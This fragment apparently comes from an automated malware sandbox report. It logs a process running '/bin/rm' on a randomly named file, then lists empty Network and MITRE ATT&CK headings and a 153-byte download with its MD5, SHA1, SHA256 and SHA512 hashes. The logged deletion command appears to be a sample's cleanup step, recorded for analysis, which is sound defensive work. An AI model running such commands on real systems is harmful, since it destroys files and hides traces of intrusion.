/bin/rmrm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:1003
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97